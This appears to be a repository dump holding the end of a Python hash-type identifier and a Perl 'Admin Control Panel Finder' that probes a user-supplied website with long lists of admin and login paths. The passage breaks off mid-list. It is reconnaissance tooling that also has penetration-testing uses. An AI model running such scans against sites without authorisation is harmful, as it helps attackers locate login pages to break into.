hs='780d43fa11693b61875321b6b54905ee488d7760' 382 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 383 | jerar.append("109500") 384 | def sha1sha1passsubstrpass03(): 385 | hs='5ed6bc680b59c580db4a38df307bd4621759324e' 386 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 387 | jerar.append("109520") 388 | def sha1sha1saltpass(): 389 | hs='70506bac605485b4143ca114cbd4a3580d76a413' 390 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 391 | jerar.append("109540") 392 | def sha1sha1sha1pass(): 393 | hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' 394 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 395 | jerar.append("109560") 396 | def sha1strtolowerusernamepass(): 397 | hs='79f575543061e158c2da3799f999eb7c95261f07' 398 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 399 | jerar.append("109580") 400 | 401 | def Haval192(): 402 | hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' 403 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 404 | jerar.append("110040") 405 | def Haval192HMAC(): 406 | hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' 407 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 408 | jerar.append("110080") 409 | def Tiger192(): 410 | hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' 411 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 412 | jerar.append("110020") 413 | def Tiger192HMAC(): 414 | hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' 415 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 416 | jerar.append("110060") 417 | 418 | def MD5passsaltjoomla1(): 419 | hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' 420 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: 421 | jerar.append("112020") 422 | 423 | def SHA1Django(): 424 | hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' 425 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: 426 | jerar.append("113020") 427 | 428 | def Haval224(): 429 | hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' 430 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 431 | jerar.append("114040") 432 | def Haval224HMAC(): 433 | hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' 434 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 435 | jerar.append("114080") 436 | def SHA224(): 437 | hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' 438 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 439 | jerar.append("114020") 440 | def SHA224HMAC(): 441 | hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' 442 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 443 | jerar.append("114060") 444 | 445 | def SHA256(): 446 | hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' 447 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 448 | jerar.append("115020") 449 | def SHA256HMAC(): 450 | hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' 451 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 452 | jerar.append("115120") 453 | def Haval256(): 454 | hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' 455 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 456 | jerar.append("115040") 457 | def Haval256HMAC(): 458 | hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' 459 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 460 | jerar.append("115140") 461 | def GOSTR341194(): 462 | hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' 463 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 464 | jerar.append("115060") 465 | def RipeMD256(): 466 | hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' 467 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 468 | jerar.append("115080") 469 | def RipeMD256HMAC(): 470 | hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' 471 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 472 | jerar.append("115160") 473 | def SNEFRU256(): 474 | hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' 475 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 476 | jerar.append("115100") 477 | def SNEFRU256HMAC(): 478 | hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' 479 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 480 | jerar.append("115180") 481 | def SHA256md5pass(): 482 | hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' 483 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 484 | jerar.append("115200") 485 | def SHA256sha1pass(): 486 | hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' 487 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 488 | jerar.append("115220") 489 | 490 | def MD5passsaltjoomla2(): 491 | hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' 492 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: 493 | jerar.append("116020") 494 | def SAM(): 495 | hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' 496 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: 497 | jerar.append("116040") 498 | 499 | def SHA256Django(): 500 | hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' 501 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: 502 | jerar.append("117020") 503 | 504 | def RipeMD320(): 505 | hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' 506 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 507 | jerar.append("118020") 508 | def RipeMD320HMAC(): 509 | hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' 510 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 511 | jerar.append("118040") 512 | 513 | def SHA384(): 514 | hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' 515 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 516 | jerar.append("119020") 517 | def SHA384HMAC(): 518 | hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' 519 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 520 | jerar.append("119040") 521 | 522 | def SHA256s(): 523 | hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' 524 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: 525 | jerar.append("120020") 526 | 527 | def SHA384Django(): 528 | hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' 529 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: 530 | print " [+] SHA-384(Django)" 531 | jerar.append("121020") 532 | 533 | def SHA512(): 534 | hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' 535 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 536 | jerar.append("122020") 537 | def SHA512HMAC(): 538 | hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' 539 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 540 | jerar.append("122060") 541 | def Whirlpool(): 542 | hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' 543 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 544 | jerar.append("122040") 545 | def WhirlpoolHMAC(): 546 | hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' 547 | if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: 548 | jerar.append("122080") 549 | 550 | 551 | print logo 552 | while True: 553 | jerar=[] 554 | print """ 555 | -------------------------------------------------------------------------""" 556 | hash = raw_input(" HASH: ") 557 | ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() 558 | 559 | if len(jerar)==0: 560 | print "" 561 | print " Not Found." 562 | elif len(jerar)>2: 563 | jerar.sort() 564 | print "" 565 | print "Possible Hashs:" 566 | print "[+] ",algorithms[jerar[0]] 567 | print "[+] ",algorithms[jerar[1]] 568 | print "" 569 | print "Least Possible Hashs:" 570 | for a in range(int(len(jerar))-2): 571 | print "[+] ",algorithms[jerar[a+2]] 572 | else: 573 | jerar.sort() 574 | print "" 575 | print "Possible Hashs:" 576 | for a in range(len(jerar)): 577 | print "[+] ",algorithms[jerar[a]] 578 | -------------------------------------------------------------------------------- /painel.pl: -------------------------------------------------------------------------------- 1 | #!/usr/bin/perl 2 | 3 | ## 4 | # By Tartou2 5 | # Admin Control Panel Finder 6 | # Home: www.next-next-future.com 7 | ## 8 | 9 | use HTTP::Request; 10 | use LWP::UserAgent; 11 | 12 | system('cls'); 13 | system('title Admin Control Panel Finder Coded by Tartou2 from www.next-next-future.com'); 14 | 15 | print"\n"; 16 | print "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n" ; 17 | print " Admin Control Panel Finder v 1 \n" ; 18 | print " Coded By Tartou2\n" ; 19 | print " website:www.next-next-future.com\n\n" ; 20 | print "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\n" ; 21 | print "\n"; 22 | 23 | print " Enter the website you want to scan \n"; 24 | print" e.g.: www.domaine.com or www.domaine.com/path\n"; 25 | print" --> "; 26 | $site=; 27 | chomp $site; 28 | 29 | print "\n\n"; 30 | print " Enter the coding language of the website \n"; 31 | print" e.g.: asp, php, cfm, any\n"; 32 | print" If you don't know the launguage used in the coding then simply type ** any ** \n"; 33 | print"--> "; 34 | $code=; 35 | chomp($code); 36 | 37 | if ( $site !~ /^http:/ ) { 38 | $site = 'http://' . $site; 39 | } 40 | if ( $site !~ /\/$/ ) { 41 | $site = $site . '/'; 42 | } 43 | print "\n"; 44 | 45 | print "->The website: $site\n"; 46 | print "->Source of the website: $code\n"; 47 | print "->Scan of the admin control panel is progressing...\n\n\n"; 48 | 49 | if($code eq "asp"){ 50 | 51 | @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 52 | 'memberadmin/','administratorlogin/','adm/','account.asp','admin/account.asp','admin/index.asp','admin/login.asp','admin/admin.asp', 53 | 'admin_area/admin.asp','admin_area/login.asp','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 54 | 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.asp','bb-admin/index.asp','bb-admin/login.asp','bb-admin/admin.asp', 55 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 56 | 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 57 | 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 58 | 'admin/home.asp','admin/controlpanel.asp','admin.asp','pages/admin/admin-login.asp','admin/admin-login.asp','admin-login.asp','admin/cp.asp','cp.asp', 59 | 'administrator/account.asp','administrator.asp','login.asp','modelsearch/login.asp','moderator.asp','moderator/login.asp','administrator/login.asp', 60 | 'moderator/admin.asp','controlpanel.asp','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 61 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.asp','user.html','admincp/index.asp','admincp/login.asp','admincp/index.html', 62 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 63 | 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 64 | 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.asp','admin/account.asp','adminpanel.asp','webadmin.asp','webadmin/index.asp', 65 | 'webadmin/admin.asp','webadmin/login.asp','admin/admin_login.asp','admin_login.asp','panel-administracion/login.asp','adminLogin.asp', 66 | 'admin/adminLogin.asp','home.asp','admin.asp','adminarea/index.asp','adminarea/admin.asp','adminarea/login.asp','admin-login.html', 67 | 'panel-administracion/index.asp','panel-administracion/admin.asp','modelsearch/index.asp','modelsearch/admin.asp','administrator/index.asp', 68 | 'admincontrol/login.asp','adm/admloginuser.asp','admloginuser.asp','admin2.asp','admin2/login.asp','admin2/index.asp','adm/index.asp', 69 | 'adm.asp','affiliate.asp','adm_auth.asp','memberadmin.asp','administratorlogin.asp','siteadmin/login.asp','siteadmin/index.asp','siteadmin/login.html' 70 | ); 71 | 72 | foreach $ways(@path1){ 73 | 74 | $final=$site.$ways; 75 | 76 | my $req=HTTP::Request->new(GET=>$final); 77 | my $ua=LWP::UserAgent->new(); 78 | $ua->timeout(30); 79 | my $response=$ua->request($req); 80 | 81 | if($response->content =~ /Username/ || 82 | $response->content =~ /Password/ || 83 | $response->content =~ /username/ || 84 | $response->content =~ /password/ || 85 | $response->content =~ /USERNAME/ || 86 | $response->content =~ /PASSWORD/ || 87 | $response->content =~ /Senha/ || 88 | $response->content =~ /senha/ || 89 | $response->content =~ /Personal/ || 90 | $response->content =~ /Usuario/ || 91 | $response->content =~ /Clave/ || 92 | $response->content =~ /Usager/ || 93 | $response->content =~ /usager/ || 94 | $response->content =~ /Sing/ || 95 | $response->content =~ /passe/ || 96 | $response->content =~ /P\/W/ || 97 | $response->content =~ /Admin Password/ 98 | ){ 99 | print " \n [+] Found -> $final\n\n"; 100 | print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n"; 101 | }else{ 102 | print "[-] Not Found <- $final\n"; 103 | } 104 | } 105 | } 106 | 107 | 108 | 109 | 110 | # ------------------------------------------------------- 111 | # -------------------test cfm ---------------------------| 112 | # ------------------------------------------------------- 113 | 114 | 115 | 116 | 117 | 118 | if($code eq "cfm"){ 119 | 120 | @path1=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 121 | 'memberadmin/','administratorlogin/','adm/','account.cfm','admin/account.cfm','admin/index.cfm','admin/login.cfm','admin/admin.cfm', 122 | 'admin_area/admin.cfm','admin_area/login.cfm','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 123 | 'admin_area/admin.html','admin_area/login.html','admin_area/index.html','admin_area/index.cfm','bb-admin/index.cfm','bb-admin/login.cfm','bb-admin/admin.cfm', 124 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','admin/controlpanel.html','admin.html','admin/cp.html','cp.html', 125 | 'administrator/index.html','administrator/login.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html','moderator.html', 126 | 'moderator/login.html','moderator/admin.html','account.html','controlpanel.html','admincontrol.html','admin_login.html','panel-administracion/login.html', 127 | 'admin/home.cfm','admin/controlpanel.cfm','admin.cfm','pages/admin/admin-login.cfm','admin/admin-login.cfm','admin-login.cfm','admin/cp.cfm','cp.cfm', 128 | 'administrator/account.cfm','administrator.cfm','login.cfm','modelsearch/login.cfm','moderator.cfm','moderator/login.cfm','administrator/login.cfm', 129 | 'moderator/admin.cfm','controlpanel.cfm','admin/account.html','adminpanel.html','webadmin.html','pages/admin/admin-login.html','admin/admin-login.html', 130 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','user.cfm','user.html','admincp/index.cfm','admincp/login.cfm','admincp/index.html', 131 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','adminarea/index.html','adminarea/admin.html','adminarea/login.html', 132 | 'panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html','admin/admin_login.html', 133 | 'admincontrol/login.html','adm/index.html','adm.html','admincontrol.cfm','admin/account.cfm','adminpanel.cfm','webadmin.cfm','webadmin/index.cfm', 134 | 'webadmin/admin.cfm','webadmin/login.cfm','admin/admin_login.cfm','admin_login.cfm','panel-administracion/login.cfm','adminLogin.cfm', 135 | 'admin/adminLogin.cfm','home.cfm','admin.cfm','adminarea/index.cfm','adminarea/admin.cfm','adminarea/login.cfm','admin-login.html', 136 | 'panel-administracion/index.cfm','panel-administracion/admin.cfm','modelsearch/index.cfm','modelsearch/admin.cfm','administrator/index.cfm', 137 | 'admincontrol/login.cfm','adm/admloginuser.cfm','admloginuser.cfm','admin2.cfm','admin2/login.cfm','admin2/index.cfm','adm/index.cfm', 138 | 'adm.cfm','affiliate.cfm','adm_auth.cfm','memberadmin.cfm','administratorlogin.cfm','siteadmin/login.cfm','siteadmin/index.cfm','siteadmin/login.html' 139 | ); 140 | 141 | foreach $ways(@path1){ 142 | 143 | $final=$site.$ways; 144 | 145 | my $req=HTTP::Request->new(GET=>$final); 146 | my $ua=LWP::UserAgent->new(); 147 | $ua->timeout(30); 148 | my $response=$ua->request($req); 149 | 150 | if($response->content =~ /Username/ || 151 | $response->content =~ /Password/ || 152 | $response->content =~ /username/ || 153 | $response->content =~ /password/ || 154 | $response->content =~ /USERNAME/ || 155 | $response->content =~ /PASSWORD/ || 156 | $response->content =~ /Senha/ || 157 | $response->content =~ /senha/ || 158 | $response->content =~ /Personal/ || 159 | $response->content =~ /Usuario/ || 160 | $response->content =~ /Clave/ || 161 | $response->content =~ /Usager/ || 162 | $response->content =~ /usager/ || 163 | $response->content =~ /Sing/ || 164 | $response->content =~ /passe/ || 165 | $response->content =~ /P\/W/ || 166 | $response->content =~ /Admin Password/ 167 | ){ 168 | print " \n [+] Found -> $final\n\n"; 169 | print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n"; 170 | }else{ 171 | print "[-] Not Found <- $final\n"; 172 | } 173 | } 174 | } 175 | 176 | 177 | 178 | 179 | 180 | # ------------------------------------------------------- 181 | #--------------------------/test-------------------------| 182 | # ------------------------------------------------------- 183 | 184 | 185 | if($code eq "php"){ 186 | 187 | @path2=('_admin/','backoffice/','admin/','administrator/','moderator/','webadmin/','adminarea/','bb-admin/','adminLogin/','admin_area/','panel-administracion/','instadmin/', 188 | 'memberadmin/','administratorlogin/','adm/','admin/account.php','admin/index.php','admin/login.php','admin/admin.php','admin/account.php', 189 | 'admin_area/admin.php','admin_area/login.php','siteadmin/login.php','siteadmin/index.php','siteadmin/login.html','admin/account.html','admin/index.html','admin/login.html','admin/admin.html', 190 | 'admin_area/index.php','bb-admin/index.php','bb-admin/login.php','bb-admin/admin.php','admin/home.php','admin_area/login.html','admin_area/index.html', 191 | 'admin/controlpanel.php','admin.php','admincp/index.asp','admincp/login.asp','admincp/index.html','admin/account.html','adminpanel.html','webadmin.html', 192 | 'webadmin/index.html','webadmin/admin.html','webadmin/login.html','admin/admin_login.html','admin_login.html','panel-administracion/login.html', 193 | 'admin/cp.php','cp.php','administrator/index.php','administrator/login.php','nsw/admin/login.php','webadmin/login.php','admin/admin_login.php','admin_login.php', 194 | 'administrator/account.php','administrator.php','admin_area/admin.html','pages/admin/admin-login.php','admin/admin-login.php','admin-login.php', 195 | 'bb-admin/index.html','bb-admin/login.html','bb-admin/admin.html','admin/home.html','login.php','modelsearch/login.php','moderator.php','moderator/login.php', 196 | 'moderator/admin.php','account.php','pages/admin/admin-login.html','admin/admin-login.html','admin-login.html','controlpanel.php','admincontrol.php', 197 | 'admin/adminLogin.html','adminLogin.html','admin/adminLogin.html','home.html','rcjakar/admin/login.php','adminarea/index.html','adminarea/admin.html', 198 | 'webadmin.php','webadmin/index.php','webadmin/admin.php','admin/controlpanel.html','admin.html','admin/cp.html','cp.html','adminpanel.php','moderator.html', 199 | 'administrator/index.html','administrator/login.html','user.html','administrator/account.html','administrator.html','login.html','modelsearch/login.html', 200 | 'moderator/login.html','adminarea/login.html','panel-administracion/index.html','panel-administracion/admin.html','modelsearch/index.html','modelsearch/admin.html', 201 | 'admincontrol/login.html','adm/index.html','adm.html','moderator/admin.html','user.php','account.html','controlpanel.html','admincontrol.html', 202 | 'panel-administracion/login.php','wp-login.php','adminLogin.php','admin/adminLogin.php','home.php','admin.php','adminarea/index.php', 203 | 'adminarea/admin.php','adminarea/login.php','panel-administracion/index.php','panel-administracion/admin.php','modelsearch/index.php', 204 | 'modelsearch/admin.php','admincontrol/login.php','adm/admloginuser.php','admloginuser.php','admin2.php','admin2/login.php','admin2/index.php', 205 | 'adm/index.php','adm.php','affiliate.php','adm_auth.php','memberadmin.php','administratorlogin.php' 206 | ); 207 | 208 | foreach $ways(@path2){ 209 | 210 | $final=$site.$ways; 211 | 212 | my $req=HTTP::Request->new(GET=>$final); 213 | my $ua=LWP::UserAgent->new(); 214 | $ua->timeout(30); 215 | my $response=$ua->request($req); 216 | 217 | if($response->content =~ /Username/ || 218 | $response->content =~ /Password/ || 219 | $response->content =~ /username/ || 220 | $response->content =~ /password/ || 221 | $response->content =~ /USERNAME/ || 222 | $response->content =~ /PASSWORD/ || 223 | $response->content =~ /Senha/ || 224 | $response->content =~ /senha/ || 225 | $response->content =~ /Personal/ || 226 | $response->content =~ /Usuario/ || 227 | $response->content =~ /Clave/ || 228 | $response->content =~ /Usager/ || 229 | $response->content =~ /usager/ || 230 | $response->content =~ /Sing/ || 231 | $response->content =~ /passe/ || 232 | $response->content =~ /P\/W/ || 233 | $response->content =~ /Admin Password/ 234 | ){ 235 | print " \n [+] Found -> $final\n\n"; 236 | print " \n Congratulation, this admin login page is working. \n\n Good luck from Tartou2 \n\n"; 237 | }else{ 238 | print "[-] Not Found <- $final\n"; 239 | } 240 | } 241 | } 242 | 243 | 244 | 245 | 246 | # ------------------------------------------------------- 247 | # ----------------------- any ---------------------------| 248 | # ------------------------------------------------------- 249 | 250 | 251 | 252 | 253 | 254 | if($code eq "any"){ 255 | 256 | @path1=('_admin/','backoffice/','account.asp','account.cfm','account.html','account.php','acct_login/','adm.asp','adm.cfm','adm.html','adm.php','adm/','adm/admloginuser.asp','adm/admloginuser.cfm','adm/admloginuser.php','adm/index.asp','adm/index.cfm','adm/index.html','adm/index.php','adm_auth.asp','adm_auth.cfm','adm_auth.php','admin.asp','admin.cfm','admin.html','admin.php','admin/','admin/account.asp','admin/account.cfm','admin/account.html','admin/account.php','admin/admin.asp','admin/admin.cfm','admin/admin.html','admin/admin.php','admin/admin_login.asp','admin/admin_login.cfm','admin/admin_login.html','admin/admin_login.php','admin/adminLogin.asp','admin/admin-login.asp','admin/adminLogin.cfm','admin/admin-login.cfm','admin/adminLogin.html','admin/admin-login.html','admin/adminLogin.php','admin/admin-login.php','admin/controlpanel.asp','admin/controlpanel.cfm','admin/controlpanel.html','admin/controlpanel.php','admin/cp.asp','admin/cp.cfm','admin/cp.html','admin/cp.php','admin/home.asp','admin/home.cfm','admin/home.html','admin/home.php','admin/index.asp','admin/index.cfm','admin/index.html','admin/index.php','admin/login.asp','admin/login.cfm','admin/login.html','admin/login.php','admin_area/','admin_area/admin.asp','admin_area/admin.cfm','admin_area/admin.html','admin_area/admin.php','admin_area/index.asp','admin_area/index.cfm','admin_area/index.html','admin_area/index.php','admin_area/login.asp','admin_area/login.cfm','admin_area/login.html','admin_area/login.php','admin_login.asp','admin_login.cfm','admin_login.html','admin_login.php','admin1.asp','admin1.html','admin1.php','admin1/','admin2.asp','admin2.cfm','admin2.html','admin2.php','admin2/index.asp','admin2/index.cfm','admin2/index.php','admin2/login.asp','admin2/login.cfm','admin2/login.php','admin4_account/','admin4_colon/','adminarea/','adminarea/admin.asp','adminarea/admin.cfm','adminarea/admin.html','adminarea/admin.php','adminarea/index.asp','adminarea/index.cfm','adminarea/index.html','adminarea/index.php','adminarea/login.asp','adminarea/login.cfm','adminarea/login.html','adminarea/login.php','admincontrol.asp','admincontrol.cfm','admincontrol.html','admincontrol.php','admincontrol/login.asp','admincontrol/login.cfm','admincontrol/login.html','admincontrol/login.php','admincp/index.asp','admincp/index.cfm','admincp/index.html','admincp/login.asp','admincp/login.cfm','administer/','administr8.asp','administr8.html','administr8.php','administr8/','administratie/','administration.html','administration.php','administration/','administrator.asp','administrator.cfm','administrator.html','administrator.php','administrator/','administrator/account.asp','administrator/account.cfm','administrator/account.html','administrator/account.php','administrator/index.asp','administrator/index.cfm','administrator/index.html','administrator/index.php','administrator/login.asp','administrator/login.cfm','administrator/login.html','administrator/login.php','administratoraccounts/','administratorlogin.asp','administratorlogin.cfm','administratorlogin.php','administratorlogin/','administrators/','administrivia/','adminLogin.asp','admin-login.asp